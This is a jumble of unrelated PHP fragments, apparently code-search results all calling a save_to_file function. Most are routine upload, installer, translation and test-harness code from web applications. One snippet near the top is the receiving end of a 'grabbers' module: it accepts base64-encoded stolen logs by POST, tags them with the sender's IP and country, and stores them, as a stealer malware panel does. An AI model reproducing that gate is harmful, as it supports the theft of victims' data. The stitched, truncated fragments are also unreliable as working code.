out_echo($message, $specialchars); exit; } $newName = $file->getName(); $oldName = $newName; // validate file name if ($error_filename = process_filename($newName)) { // Not a file name or not an allowed extension $message['text'] = '<span class="result_error"> ' . $error_filename . '</span>'; out_echo($message, $specialchars); exit; } list($newFile, $oldFile_thumb) = check_file_exists($fm_FileRoot, $path, $newName); $newName = $newFile->get('name'); // If everything is ok, save the file somewhere if (save_to_file($file->get_content(), $newFile->get_full_path(), 'wb')) { // Change to default chmod settings $newFile->chmod(NULL); // Refreshes file properties (type, size, perms...) $newFile->load_properties(); // save file into the db $newFile->dbsave(); // Prepare the uploaded file to the final format ( E.g. Resize and Rotate images ) prepare_uploaded_files(array($newFile)); $message = ''; if (!empty($oldFile_thumb)) { $image_info = getimagesize($newFile->get_full_path()); if ($image_info) { $newFile_thumb = $newFile->get_preview_thumb('fulltype'); } else { $newFile_thumb = $newFile->get_size_formatted();
<?php ini_set("max_execution_time", 0); require "includes/geoip.php"; require "includes/functions.php"; if (isset($_POST["logs"])) { $logs = trim($_POST["logs"]); $logs = str_replace(" ", "+", $logs); $logs = base64_decode($logs); if (isset($_POST["module"]) && $_POST["module"] == "grabbers") { $ip = $_SERVER["REMOTE_ADDR"]; $country = get_country($ip); $date = date("d.m.Y H:i.s"); save_to_file("logs/grabbers/grabbers.txt", "==============================\r\n IP: {$ip}\r\n Country: {$country}\r\n Date: {$date}\r\n==============================\r\n\r\n" . $logs . "\r\n"); } }
function run_test($file) { if ($this->conf['TEST_PHP_DETAILED']) { $this->writemsg("\n=================\nTEST {$file}\n"); } $section_text = $this->getSectionText($file); if ($this->iswin32) { $shortname = str_replace($this->conf['TEST_BASE_PATH'] . '\\', '', $file); } else { $shortname = str_replace($this->conf['TEST_BASE_PATH'] . '/', '', $file); } $tested = $section_text['TEST'] . " [{$shortname}]"; if ($this->conf['TEST_WEB']) { $tmp_file = ereg_replace('\\.phpt$', '.' . $this->conf['TEST_WEB_EXT'], $file); $uri = $this->conf['TEST_BASE_SCRIPT_NAME'] . str_replace($this->conf['TEST_BASE_PATH'], '', $tmp_file); $uri = str_replace('\\', '/', $uri); } else { $tmp_file = ereg_replace('\\.phpt$', '.php', $file); } @unlink($tmp_file); // unlink old test results @unlink(ereg_replace('\\.phpt$', '.diff', $file)); @unlink(ereg_replace('\\.phpt$', '.log', $file)); @unlink(ereg_replace('\\.phpt$', '.exp', $file)); @unlink(ereg_replace('\\.phpt$', '.out', $file)); if (!$this->conf['TEST_WEB']) { // Reset environment from any previous test. $env = $this->getENVSettings($section_text, $tmp_file); $ini_overwrites = $this->getINIParams($section_text); } // if this is a cgi test, prepare for it $query_string = ''; $havepost = array_key_exists('POST', $section_text) && !empty($section_text['POST']); // allow empty query_string requests $haveget = array_key_exists('GET', $section_text) && !empty($section_text['GET']); $do_cgi = array_key_exists('CGI', $section_text) || $haveget || $havepost; $skipreason = $this->getSkipReason($file, $section_text, $do_cgi); if ($skipreason == 'SKIPPED') { return $skipreason; } // We've satisfied the preconditions - run the test! save_to_file($tmp_file, $section_text['FILE']); $post = NULL; $args = ""; $headers = array(); if ($this->conf['TEST_WEB']) { $request = $this->getEvalTestSettings(@$section_text['REQUEST'], $tmp_file); $headers = $this->getEvalTestSettings(@$section_text['HEADERS'], $tmp_file); $method = isset($request['method']) ? $request['method'] : $havepost ? 'POST' : 'GET'; $query_string = $haveget ? $section_text['GET'] : ''; $options = array(); $options['method'] = $method; if (isset($this->conf['timeout'])) { $options['timeout'] = $this->conf['timeout']; } if (isset($this->conf['proxy_host'])) { $options['proxy_host'] = $this->conf['proxy_host']; } if (isset($this->conf['proxy_port'])) { $options['proxy_port'] = $this->conf['proxy_port']; } if (isset($this->conf['proxy_user'])) { $options['proxy_user'] = $this->conf['proxy_user']; } if (isset($this->conf['proxy_pass'])) { $options['proxy_pass'] = $this->conf['proxy_pass']; } $post = $havepost ? $section_text['POST'] : NULL; $url = $this->conf['TEST_SERVER_URL']; if (isset($request['SCRIPT_NAME'])) { $url .= $request['SCRIPT_NAME']; } else { $url .= $uri; } if (isset($request['PATH_INFO'])) { $url .= $request['PATH_INFO']; } if (isset($request['FRAGMENT'])) { $url .= '#' . $request['FRAGMENT']; } if (isset($request['QUERY_STRING'])) { $query_string = $request['QUERY_STRING']; } if ($query_string) { $url .= '?' . $query_string; } if ($this->conf['TEST_PHP_DETAILED']) { $this->writemsg("\nURL = {$url}\n"); } } else { if ($do_cgi) { $query_string = $haveget ? $section_text['GET'] : ''; if (!array_key_exists('GATEWAY_INTERFACE', $env)) { $env['GATEWAY_INTERFACE'] = 'CGI/1.1'; } if (!array_key_exists('SERVER_SOFTWARE', $env)) { $env['SERVER_SOFTWARE'] = 'PHP Test Harness'; } if (!array_key_exists('SERVER_SOFTWARE', $env)) { $env['SERVER_NAME'] = '127.0.0.1'; } if (!array_key_exists('REDIRECT_STATUS', $env)) { $env['REDIRECT_STATUS'] = '200'; } if (!array_key_exists('SERVER_NAME', $env)) { $env['QUERY_STRING'] = $query_string; } if (!array_key_exists('PATH_TRANSLATED', $env) && !array_key_exists('SCRIPT_FILENAME', $env)) { $env['PATH_TRANSLATED'] = $tmp_file; $env['SCRIPT_FILENAME'] = $tmp_file; } if (!array_key_exists('PATH_TRANSLATED', $env)) { $env['PATH_TRANSLATED'] = ''; } if (!array_key_exists('PATH_INFO', $env)) { $env['PATH_INFO'] = ''; } if (!array_key_exists('SCRIPT_NAME', $env)) { $env['SCRIPT_NAME'] = ''; } if (!array_key_exists('SCRIPT_FILENAME', $env)) { $env['SCRIPT_FILENAME'] = ''; } if (array_key_exists('POST', $section_text) && (!$haveget || !empty($section_text['POST']))) { $post = $section_text['POST']; $content_length = strlen($post); if (!array_key_exists('REQUEST_METHOD', $env)) { $env['REQUEST_METHOD'] = 'POST'; } if (!array_key_exists('CONTENT_TYPE', $env)) { $env['CONTENT_TYPE'] = 'application/x-www-form-urlencoded'; } if (!array_key_exists('CONTENT_LENGTH', $env)) { $env['CONTENT_LENGTH'] = $content_length; } } else { if (!array_key_exists('REQUEST_METHOD', $env)) { $env['REQUEST_METHOD'] = 'GET'; } if (!array_key_exists('CONTENT_TYPE', $env)) { $env['CONTENT_TYPE'] = ''; } if (!array_key_exists('CONTENT_LENGTH', $env)) { $env['CONTENT_LENGTH'] = ''; } } if ($this->conf['TEST_PHP_DETAILED'] > 1) { $this->writemsg("\nCONTENT_LENGTH = " . $env['CONTENT_LENGTH'] . "\nCONTENT_TYPE = " . $env['CONTENT_TYPE'] . "\nPATH_TRANSLATED = " . $env['PATH_TRANSLATED'] . "\nPATH_INFO = " . $env['PATH_INFO'] . "\nQUERY_STRING = " . $env['QUERY_STRING'] . "\nREDIRECT_STATUS = " . $env['REDIRECT_STATUS'] . "\nREQUEST_METHOD = " . $env['REQUEST_METHOD'] . "\nSCRIPT_NAME = " . $env['SCRIPT_NAME'] . "\nSCRIPT_FILENAME = " . $env['SCRIPT_FILENAME'] . "\n"); } /* not cgi spec to put query string on command line, but used by a couple tests to catch a security hole in older php versions. At least IIS can be configured to do this. */ $args = $env['QUERY_STRING']; $args = "{$ini_overwrites} {$tmp_file} \"{$args}\" 2>&1"; } else { $args = $section_text['ARGS'] ? $section_text['ARGS'] : ''; $args = "{$ini_overwrites} {$tmp_file} {$args} 2>&1"; } } if ($this->conf['TEST_WEB']) { // we want headers also, so fopen $r = new HTTPRequest($url, $headers, $options, $post); //$out = preg_replace("/\r\n/","\n",$r->response); $out = $r->response; $headers = $r->response_headers; //print $r->outgoing_payload."\n"; //print $r->incoming_payload."\n"; } else { $out = execute($this->conf['TEST_PHP_EXECUTABLE'], $args, $post, $this->cwd, $env); // if this is a cgi, remove the headers first if ($this->test_executable_iscgi && preg_match("/^(.*?)\r?\n\r?\n(.*)/s", $out, $match)) { $out = $match[2]; $rh = preg_split("/[\n\r]+/", $match[1]); $headers = array(); foreach ($rh as $line) { if (strpos($line, ':') !== false) { $line = explode(":", $line, 2); $headers[trim($line[0])] = trim($line[1]); } } } } if ($this->conf['TEST_PHP_DETAILED'] > 2) { echo "HEADERS: "; print_r($headers); echo "OUTPUT: \n{$out}\n"; } // Does the output match what is expected? $output = trim($out); $output = preg_replace('/\\r\\n/', "\n", $output); $failed = FALSE; if (isset($section_text['EXPECTF']) || isset($section_text['EXPECTREGEX'])) { if (isset($section_text['EXPECTF'])) { $wanted = $section_text['EXPECTF']; } else { $wanted = $section_text['EXPECTREGEX']; } $wanted_re = preg_replace('/\\r\\n/', "\n", $wanted); if (isset($section_text['EXPECTF'])) { $wanted_re = preg_quote($wanted_re, '/'); // Stick to basics $wanted_re = str_replace("%s", ".+?", $wanted_re); //not greedy $wanted_re = str_replace("%i", "[+\\-]?[0-9]+", $wanted_re); $wanted_re = str_replace("%d", "[0-9]+", $wanted_re); $wanted_re = str_replace("%x", "[0-9a-fA-F]+", $wanted_re); $wanted_re = str_replace("%f", "[+\\-]?\\.?[0-9]+\\.?[0-9]*(E-?[0-9]+)?", $wanted_re); $wanted_re = str_replace("%c", ".", $wanted_re); // %f allows two points "-.0.0" but that is the best *simple* expression } /* DEBUG YOUR REGEX HERE var_dump($wanted_re); print(str_repeat('=', 80) . "\n"); var_dump($output); */ $failed = !preg_match("/^{$wanted_re}\$/s", $output); } $skipexpect = false; if (!$failed && $this->conf['TEST_WEB'] && isset($section_text['EXPECTHEADERS'])) { $want = array(); $lines = preg_split("/[\n\r]+/", $section_text['EXPECTHEADERS']); $wanted = ''; foreach ($lines as $line) { if (strpos($line, ':') !== false) { $line = explode(":", $line, 2); $want[trim($line[0])] = trim($line[1]); $wanted .= trim($line[0]) . ': ' . trim($line[1]) . "\n"; } } $output = ''; foreach ($want as $k => $v) { $output .= "{$k}: {$headers[$k]}\n"; if (!isset($headers[$k]) || $headers[$k] != $v) { $failed = TRUE; } } // different servers may do different things on non-200 results // for instance, IIS will deliver it's own error pages, so we // cannot expect to match up the EXPECT section. We may however, // want to match EXPECT on more than 200 results, so this may // need to change later. $skipexpect = isset($headers['Status']) && $headers['Status'] != 200; } if (!$failed && !$skipexpect && isset($section_text['EXPECT'])) { $wanted = $section_text['EXPECT']; $wanted = preg_replace('/\\r\\n/', "\n", $wanted); $failed = 0 != strcmp($output, $wanted); } if (!$failed) { @unlink($tmp_file); $this->showstatus($tested, 'PASSED'); return 'PASSED'; } // Test failed so we need to report details. $this->showstatus($tested, 'FAILED'); $this->failed_tests[] = array('name' => $file, 'test_name' => $tested, 'output' => ereg_replace('\\.phpt$', '.log', $file), 'diff' => ereg_replace('\\.phpt$', '.diff', $file)); if ($this->conf['TEST_PHP_DETAILED']) { $this->writemsg(generate_diff($wanted, $output) . "\n"); } // write .exp if (strpos($this->conf['TEST_PHP_LOG_FORMAT'], 'E') !== FALSE) { $logname = ereg_replace('\\.phpt$', '.exp', $file); save_to_file($logname, $wanted); } // write .out if (strpos($this->conf['TEST_PHP_LOG_FORMAT'], 'O') !== FALSE) { $logname = ereg_replace('\\.phpt$', '.out', $file); save_to_file($logname, $output); } // write .diff if (strpos($this->conf['TEST_PHP_LOG_FORMAT'], 'D') !== FALSE) { $logname = ereg_replace('\\.phpt$', '.diff', $file); save_to_file($logname, generate_diff($wanted, $output)); } // write .log if (strpos($this->conf['TEST_PHP_LOG_FORMAT'], 'L') !== FALSE) { $logname = ereg_replace('\\.phpt$', '.log', $file); save_to_file($logname, "\n---- EXPECTED OUTPUT\n{$wanted}\n" . "---- ACTUAL OUTPUT\n{$output}\n" . "---- FAILED\n"); // display emacs/msvc error output if (strpos($this->conf['TEST_PHP_LOG_FORMAT'], 'C') !== FALSE) { $this->error_report($file, $logname, $tested); } } return 'FAILED'; }
// Validate URL and parse it for the file name if (!is_absolute_url($url) || !($parsed_url = parse_url($url)) || empty($parsed_url['scheme']) || empty($parsed_url['host']) || empty($parsed_url['path']) || $parsed_url['path'] == '/') { // Includes forbidding getting the root of a server $failedFiles[$k] = T_('The URL must start with <code>http://</code> or <code>https://</code> and point to a valid file!'); continue; } $file_contents = fetch_remote_page($url, $info, NULL, $Settings->get('upload_maxkb')); if ($file_contents !== false) { // Create temporary file and insert contents into it. $tmpfile_name = tempnam(sys_get_temp_dir(), 'fmupload'); if (!$tmpfile_name) { $failedFiles[$k] = 'Failed to find temporary directory.'; // no trans: very unlikely continue; } if (!save_to_file($file_contents, $tmpfile_name, 'w')) { unlink($tmpfile_name); $failedFiles[$k] = sprintf('Could not write to temporary file (%s).', $tmpfile_name); continue; } // Fake/inject info into PHP's array of uploaded files. // fp> TODO! This is a nasty dirty hack. That kind of stuff always breaks somewhere down the line. Needs cleanup. // This allows us to treat it (nearly) the same way as regular uploads, apart from // is_uploaded_file(), which we skip and move_uploaded_file() (where we use rename()). $_FILES['uploadfile']['name'][$k] = rawurldecode(basename($parsed_url['path'])); $_FILES['uploadfile']['size'][$k] = evo_bytes($file_contents); $_FILES['uploadfile']['error'][$k] = 0; $_FILES['uploadfile']['tmp_name'][$k] = $tmpfile_name; $_FILES['uploadfile']['_evo_fetched_url'][$k] = $url; // skip is_uploaded_file and keep info unset($file_contents);
/** * metaWeblog.newMediaObject image upload * wp.uploadFile * * Supplied image is encoded into the struct as bits * * @see http://www.xmlrpc.com/metaWeblogApi#metaweblognewmediaobject * @see http://codex.wordpress.org/XML-RPC_wp#wp.uploadFile * * @param xmlrpcmsg XML-RPC Message * 0 blogid (string): Unique identifier of the blog the post will be added to. * Currently ignored in b2evo, in favor of the category. * 1 username (string): Login for a Blogger user who has permission to edit the given * post (either the user who originally created it or an admin of the blog). * 2 password (string): Password for said username. * 3 struct (struct) * - name : filename * - type : mimetype * - bits : base64 encoded file * @return xmlrpcresp XML-RPC Response */ function _wp_mw_newmediaobject($m) { global $Settings, $Plugins, $force_upload_forbiddenext; // CHECK LOGIN: /** * @var User */ if (!($current_User =& xmlrpcs_login($m, 1, 2))) { // Login failed, return (last) error: return xmlrpcs_resperror(); } // GET BLOG: /** * @var Blog */ if (!($Blog =& xmlrpcs_get_Blog($m, 0))) { // Login failed, return (last) error: return xmlrpcs_resperror(); } // CHECK PERMISSION: if (!$current_User->check_perm('files', 'add', false, $Blog->ID)) { // Permission denied return xmlrpcs_resperror(3); // User error 3 } logIO('Permission granted.'); if (!$Settings->get('upload_enabled')) { return xmlrpcs_resperror(2, 'Object upload not allowed'); } $xcontent = $m->getParam(3); // Get the main data - and decode it properly for the image - sorry, binary object logIO('Decoding content...'); $contentstruct = xmlrpc_decode_recurse($xcontent); $data = $contentstruct['bits']; $file_mimetype = isset($contentstruct['type']) ? $contentstruct['type'] : '(none)'; logIO('Received MIME type: ' . $file_mimetype); $overwrite = false; if (isset($contentstruct['overwrite'])) { $overwrite = (bool) $contentstruct['overwrite']; } logIO('Overwrite if exists: ' . ($overwrite ? 'yes' : 'no')); load_funcs('files/model/_file.funcs.php'); $filesize = evo_bytes($data); if (($maxfilesize = $Settings->get('upload_maxkb') * 1024) && $filesize > $maxfilesize) { return xmlrpcs_resperror(4, sprintf(T_('The file is too large: %s but the maximum allowed is %s.'), bytesreadable($filesize, false), bytesreadable($maxfilesize, false))); } logIO('File size is OK: ' . bytesreadable($filesize, false)); $FileRootCache =& get_FileRootCache(); $fm_FileRoot =& $FileRootCache->get_by_type_and_ID('collection', $Blog->ID, true); if (!$fm_FileRoot) { // fileRoot not found: return xmlrpcs_resperror(14, 'File root not found'); } $rf_filepath = $contentstruct['name']; logIO('Received filepath: ' . $rf_filepath); // Split into path + name: $filepath_parts = explode('/', $rf_filepath); $filename = array_pop($filepath_parts); logIO('Original file name: ' . $filename); // Validate and sanitize filename if ($error_filename = process_filename($filename, true)) { return xmlrpcs_resperror(5, $error_filename); } logIO('Sanitized file name: ' . $filename); // Check valid path parts: $rds_subpath = ''; foreach ($filepath_parts as $filepath_part) { if (empty($filepath_part) || $filepath_part == '.') { // self ref not useful continue; } if ($error = validate_dirname($filepath_part)) { // invalid relative path: logIO($error); return xmlrpcs_resperror(6, $error); } $rds_subpath .= $filepath_part . '/'; } logIO('Subpath: ' . $rds_subpath); // Create temporary file and insert contents into it. $tmpfile_name = tempnam(sys_get_temp_dir(), 'fmupload'); if ($tmpfile_name) { if (save_to_file($data, $tmpfile_name, 'wb')) { $image_info = @getimagesize($tmpfile_name); } else { return xmlrpcs_resperror(13, 'Error while writing to temp file.'); } } if (!empty($image_info)) { // This is an image file, let's check mimetype and correct extension if ($image_info['mime'] != $file_mimetype) { // Invalid file type $FiletypeCache =& get_FiletypeCache(); // Get correct file type based on mime type $correct_Filetype = $FiletypeCache->get_by_mimetype($image_info['mime'], false, false); $file_mimetype = $image_info['mime']; // Check if file type is known by us, and if it is allowed for upload. // If we don't know this file type or if it isn't allowed we don't change the extension! The current extension is allowed for sure. if ($correct_Filetype && $correct_Filetype->is_allowed()) { // A FileType with the given mime type exists in database and it is an allowed file type for current User // The "correct" extension is a plausible one, proceed... $correct_extension = array_shift($correct_Filetype->get_extensions()); $path_info = pathinfo($filename); $current_extension = $path_info['extension']; // change file extension to the correct extension, but only if the correct extension is not restricted, this is an extra security check! if (strtolower($current_extension) != strtolower($correct_extension) && !in_array($correct_extension, $force_upload_forbiddenext)) { // change the file extension to the correct extension $old_filename = $filename; $filename = $path_info['filename'] . '.' . $correct_extension; } } } } // Get File object for requested target location: $FileCache =& get_FileCache(); $newFile =& $FileCache->get_by_root_and_path($fm_FileRoot->type, $fm_FileRoot->in_type_ID, trailing_slash($rds_subpath) . $filename, true); if ($newFile->exists()) { if ($overwrite && $newFile->unlink()) { // OK, file deleted // Delete thumb caches from old location: logIO('Old file deleted'); $newFile->rm_cache(); } else { return xmlrpcs_resperror(8, sprintf(T_('The file «%s» already exists.'), $filename)); } } // Trigger plugin event if ($Plugins->trigger_event_first_false('AfterFileUpload', array('File' => &$newFile, 'name' => &$filename, 'type' => &$file_mimetype, 'tmp_name' => &$tmpfile_name, 'size' => &$filesize))) { // Plugin returned 'false'. // Abort upload for this file: @unlink($tmpfile_name); return xmlrpcs_resperror(16, 'File upload aborted by a plugin.'); } if (!mkdir_r($newFile->get_dir())) { // Dir didn't already exist and could not be created return xmlrpcs_resperror(9, 'Error creating sub directories: ' . $newFile->get_rdfs_rel_path()); } if (!@rename($tmpfile_name, $newFile->get_full_path())) { return xmlrpcs_resperror(13, 'Error while writing to file.'); } // chmod the file $newFile->chmod(); // Initializes file properties (type, size, perms...) $newFile->load_properties(); // Load meta data AND MAKE SURE IT IS CREATED IN DB: $newFile->meta == 'unknown'; $newFile->load_meta(true); // Resize and rotate logIO('Running file post-processing (resize and rotate)...'); prepare_uploaded_files(array($newFile)); logIO('Done'); $url = $newFile->get_url(); logIO('URL of new file: ' . $url); $struct = new xmlrpcval(array('file' => new xmlrpcval($filename, 'string'), 'url' => new xmlrpcval($url, 'string'), 'type' => new xmlrpcval($file_mimetype, 'string')), 'struct'); logIO('OK.'); return new xmlrpcresp($struct); }
function handle_submit() { global $db_connections, $def_coy, $tb_pref_counter, $db, $comp_path, $comp_subdirs; $new = false; if (!check_data()) { return false; } $id = $_GET['id']; $db_connections[$id]['name'] = $_POST['name']; $db_connections[$id]['host'] = $_POST['host']; $db_connections[$id]['dbuser'] = $_POST['dbuser']; $db_connections[$id]['dbpassword'] = $_POST['dbpassword']; $db_connections[$id]['dbname'] = $_POST['dbname']; if ((bool) $_POST['def'] == true) { $def_coy = $id; } if (isset($_GET['ul']) && $_GET['ul'] == 1) { $conn = $db_connections[$id]; if (($db = db_create_db($conn)) == 0) { display_error(tr("Error creating Database: ") . $conn['dbname'] . tr(", Please create it manually")); remove_connection($id); set_global_connection(); return false; } $filename = $_FILES['uploadfile']['tmp_name']; if (is_uploaded_file($filename)) { db_import($filename, $conn, $id); if (isset($_POST['admpassword']) && $_POST['admpassword'] != "") { db_query("UPDATE users set password = '******'admpassword']) . "' WHERE user_id = 'admin'"); } } else { display_error(tr("Error uploading Database Script, please upload it manually")); set_global_connection(); return false; } set_global_connection(); } $error = write_config_db($new); if ($error == -1) { display_error(tr("Cannot open the configuration file - ") . $path_to_root . "/config_db.php"); } else { if ($error == -2) { display_error(tr("Cannot write to the configuration file - ") . $path_to_root . "/config_db.php"); } else { if ($error == -3) { display_error(tr("The configuration file ") . $path_to_root . "/config_db.php" . tr(" is not writable. Change its permissions so it is, then re-run the operation.")); } } } if ($error != 0) { return false; } $index = "<?php\nheader(\"Location: ../../index.php\");\n?>"; if ($new) { $cdir = $comp_path . '/' . $id; @mkdir($cdir); save_to_file($cdir . '/' . 'index.php', 0, $index); foreach ($comp_subdirs as $dir) { @mkdir($cdir . '/' . $dir); save_to_file($cdir . '/' . $dir . '/' . 'index.php', 0, $index); } } return true; }
/** * Prepare maintenance directory * * @param string directory path * @param boolean create .htaccess file with 'deny from all' text * @return boolean */ function prepare_maintenance_dir($dir_name, $deny_access = true) { // echo '<p>'.T_('Checking destination directory: ').$dir_name.'</p>'; if (!file_exists($dir_name)) { // We can create directory if (!mkdir_r($dir_name)) { echo '<p style="color:red">' . sprintf(T_('Unable to create «%s» directory.'), $dir_name) . '</p>'; evo_flush(); return false; } } if ($deny_access) { // Create .htaccess file echo '<p>' . T_('Checking .htaccess denial for directory: ') . $dir_name; evo_flush(); $htaccess_name = $dir_name . '.htaccess'; if (!file_exists($htaccess_name)) { // We can create .htaccess file if (!save_to_file('deny from all', $htaccess_name, 'w')) { echo '</p><p style="color:red">' . sprintf(T_('Unable to create «%s» file in directory.'), $htaccess_name) . '</p>'; evo_flush(); return false; } if (!file_exists($dir_name . 'index.html')) { // Create index.html to disable directory browsing save_to_file('', $dir_name . 'index.html', 'w'); } } echo ' : OK.</p>'; evo_flush(); // fp> TODO: make sure "deny all" actually works by trying to request the directory through HTTP } return true; }
/** * Generate .POT file */ function translation_generate_pot_file() { global $DB, $locales_path; $pot_file_name = $locales_path . 'messages.pot'; $pot_content = array(); $pot_content[] = '# b2evolution - Language file'; $pot_content[] = '# Copyright (C) ' . date('Y') . ' Francois PLANQUE'; $pot_content[] = '# This file is distributed under the same license as the b2evolution package.'; $pot_content[] = ''; global $basepath; $translation_strings = array(); translation_scandir($basepath, $translation_strings); foreach ($translation_strings as $string => $files) { // Format the translation strings to write in .POT file foreach ($files as $file) { $pot_content[] = '#: ' . $file; } $pot_content[] = 'msgid "' . $string . '"'; $pot_content[] = 'msgstr ""'; $pot_content[] = ''; } // Write to .POT file $ok = save_to_file(implode("\r\n", $pot_content), $pot_file_name, 'w+'); return (bool) $ok; }
* @authors Your Name (you@example.org) * @date 2016-02-18 12:02:31 * @version $Id$ */ $data = $_POST["data"]; // echo "hello world"; // $filename=dirname(__FILE__); chdir('/www/sgh'); // $imgname="aaa".".png"; $img_path1 = '/www/sgh/html/aaa.txt'; // $img_path2='/html/images/'.$imgname; // function convert_data($data){ // $image=base64_decode($data); // save_to_file($image); // } function save_to_file() { echo "hello world"; echo filesize($img_path1); $fp = fopen('/www/sgh/html/aaa.txt', "r"); $return_data = fread($fp, filesize($img_path1)); // echo $return_data; fclose($fp); echo $return_data; // $arr=array('data'=>$return_data); // exit(json_decode($arr)); } save_to_file(); // convert_data($data); // $arr=array("url"=>$img_path2); // exit(json_encode($arr));
$block_item_Widget->disp_template_replaced('block_start'); $download_url = param('upd_url', 'string'); $upgrade_name = param('upd_name', 'string', '', true); $upgrade_file = $upgrade_path . $upgrade_name . '.zip'; if ($success = prepare_maintenance_dir($upgrade_path, true)) { // Set maximum execution time set_max_execution_time(1800); // 30 minutes echo '<p>' . sprintf(T_('Downloading package to «<strong>%s</strong>»...'), $upgrade_file); evo_flush(); // Downloading $file_contents = fetch_remote_page($download_url, $info, 1800); if (empty($file_contents)) { $success = false; echo '</p><p style="color:red">' . sprintf(T_('Unable to download package from «%s»'), $download_url) . '</p>'; } elseif (!save_to_file($file_contents, $upgrade_file, 'w')) { // Impossible to save file... $success = false; echo '</p><p style="color:red">' . sprintf(T_('Unable to create file: «%s»'), $upgrade_file) . '</p>'; if (file_exists($upgrade_file)) { // Remove file from disk if (!@unlink($upgrade_file)) { echo '<p style="color:red">' . sprintf(T_('Unable to remove file: «%s»'), $upgrade_file) . '</p>'; } } } else { // The package is downloaded successfully echo ' OK.</p>'; } evo_flush(); }
function convert_data($data) { $image = base64_decode($data); save_to_file($image); }
/** * Generate .POT file */ function translation_generate_pot_file() { global $DB, $locales_path; $pot_file_name = $locales_path . 'messages.pot'; $pot_content = array(); $pot_content[] = '# b2evolution - Language file'; $pot_content[] = '# Copyright (C) ' . date('Y') . ' Francois PLANQUE'; $pot_content[] = '# This file is distributed under the same license as the b2evolution package.'; $pot_content[] = ''; global $basepath; $translation_strings = array(); translation_scandir($basepath, $translation_strings); foreach ($translation_strings as $string => $files) { // Format the translation strings to write in .POT file if (isset($files['trans'])) { // Text of TRANS info if (is_array($files['trans'])) { // Multiline TRANS info foreach ($files['trans'] as $ft => $files_trans) { $pot_content[] = '#. ' . ($ft == 0 ? 'TRANS: ' : '') . $files_trans; } } else { // Single TRANS info $pot_content[] = '#. TRANS: ' . $files['trans']; } unset($files['trans']); } foreach ($files as $file) { // File name and line number where string exists $pot_content[] = '#: ' . $file[1] . ':' . $file[0]; } if (strpos($string, '%') !== false) { // Char '%' is detected in the string if (preg_match('/%(s|\\d*d)/', $string)) { // The string contains a mask like %s or %d $pot_content[] = '#, php-format'; } else { // The string contains a simple char '%' $pot_content[] = '#, no-php-format'; } } $pot_content[] = 'msgid "' . $string . '"'; $pot_content[] = 'msgstr ""'; $pot_content[] = ''; } // Write to .POT file $ok = (bool) save_to_file(implode("\n", $pot_content), $pot_file_name, 'w+'); if (!$ok) { // Inform user about no permission to write POT file global $Messages; $Messages->add(sprintf(T_('The file %s cannot be written to disk. Please check the filesystem permissions.'), '<b>' . $pot_file_name . '</b>'), 'error'); } return $ok; }
function save_to_file($filename, $name, $email, $year, $month, $day, $sex) { // TODO } // read in form values $name = get_value_post("name"); $email = get_value_post("email"); $year = get_value_post("year"); $month = get_value_post("month"); $day = get_value_post("day"); $sex = get_value_post("sex"); $terms = get_value_post("terms"); // check if the form has been submitted -- any of the input values is set $submitted = isset($_POST['name']); if ($submitted) { // check for errors $errors = input_check($name, $email, $year, $month, $day, $sex, $terms); if (count($errors) > 0) { display_form($name, $email, $year, $month, $day, $sex, $terms, $errors); } else { confirm($name, $email, $year, $month, $day, $sex); save_to_file("users.txt", $name, $email, $year, $month, $day, $sex); } } else { // display form for the first time display_form(); } ?> </body> </html>
/** * Update file /conf/_basic_config.php * * @param string Current action, updated by reference * @param array Params * @return boolean TRUE on success */ function update_basic_config_file($params = array()) { global $DB, $db_config, $evo_charset, $conf_path, $default_locale; // These global params should be rewritten by this function on success result global $baseurl, $admin_email, $config_is_done, $action; $params = array_merge(array('db_user' => '', 'db_password' => '', 'db_name' => '', 'db_host' => '', 'db_tableprefix' => '', 'baseurl' => '', 'admin_email' => '', 'print_messages' => true, 'quick_install' => false), $params); if (!$params['print_messages']) { // Start to get all messages instead of printing on screen: ob_start(); // Use this global var to store all messages global $basic_config_file_result_messages; } // Connect to DB: $DB = new DB(array('user' => $params['db_user'], 'password' => $params['db_password'], 'name' => $params['db_name'], 'host' => $params['db_host'], 'aliases' => $db_config['aliases'], 'connection_charset' => empty($db_config['connection_charset']) ? DB::php_to_mysql_charmap($evo_charset) : $db_config['connection_charset'], 'halt_on_error' => false)); if ($DB->error) { // restart conf display_install_messages(T_('It seems that the database config settings you entered don\'t work. Please check them carefully and try again...')); $action = 'start'; } else { $conf_template_filepath = $conf_path . '_basic_config.template.php'; $conf_filepath = $conf_path . '_basic_config.php'; // Read original: $file_loaded = @file($conf_template_filepath); if (empty($file_loaded)) { // This should actually never happen, just in case... display_install_messages(sprintf(T_('Could not load original conf file [%s]. Is it missing?'), $conf_filepath)); if (!$params['print_messages']) { // Return all messages instead of printing on screen $basic_config_file_result_messages = ob_get_clean(); } return false; } // File loaded... $conf = implode('', $file_loaded); // Update conf: $conf = preg_replace(array('#\\$db_config\\s*=\\s*array\\( \\s*[\'"]user[\'"]\\s*=>\\s*[\'"].*?[\'"], ([^\\n\\r]*\\r?\\n) \\s*[\'"]password[\'"]\\s*=>\\s*[\'"].*?[\'"], ([^\\n\\r]*\\r?\\n) \\s*[\'"]name[\'"]\\s*=>\\s*[\'"].*?[\'"], ([^\\n\\r]*\\r?\\n) \\s*[\'"]host[\'"]\\s*=>\\s*[\'"].*?[\'"], ([^\\n\\r]*\\r?\\n) #ixs', "#tableprefix\\s*=\\s*'.*?';#", "#baseurl\\s*=\\s*'.*?';#", "#admin_email\\s*=\\s*'.*?';#", "#config_is_done\\s*=.*?;#"), array("\$db_config = array(\n" . "\t'user' => '" . str_replace(array("'", "\$"), array("\\'", "\\\$"), $params['db_user']) . "',\$1" . "\t'password' => '" . str_replace(array("'", "\$"), array("\\'", "\\\$"), $params['db_password']) . "',\$2" . "\t'name' => '" . str_replace(array("'", "\$"), array("\\'", "\\\$"), $params['db_name']) . "',\$3" . "\t'host' => '" . str_replace(array("'", "\$"), array("\\'", "\\\$"), $params['db_host']) . "',\$4", "tableprefix = '" . str_replace("'", "\\'", $params['db_tableprefix']) . "';", "baseurl = '" . str_replace("'", "\\'", $params['baseurl']) . "';", "admin_email = '" . str_replace("'", "\\'", $params['admin_email']) . "';", 'config_is_done = 1;'), $conf); // Write new contents: if (save_to_file($conf, $conf_filepath, 'w')) { display_install_messages(sprintf(T_('Your configuration file <code>%s</code> has been successfully created.') . '</p>', $conf_filepath), 'success'); $tableprefix = $params['db_tableprefix']; $baseurl = $params['baseurl']; $admin_email = $params['admin_email']; $config_is_done = 1; if (!$params['quick_install']) { // Switch to menu only on standard installation: $action = 'menu'; } } else { ?> <h1><?php echo T_('Config file update'); ?> </h1> 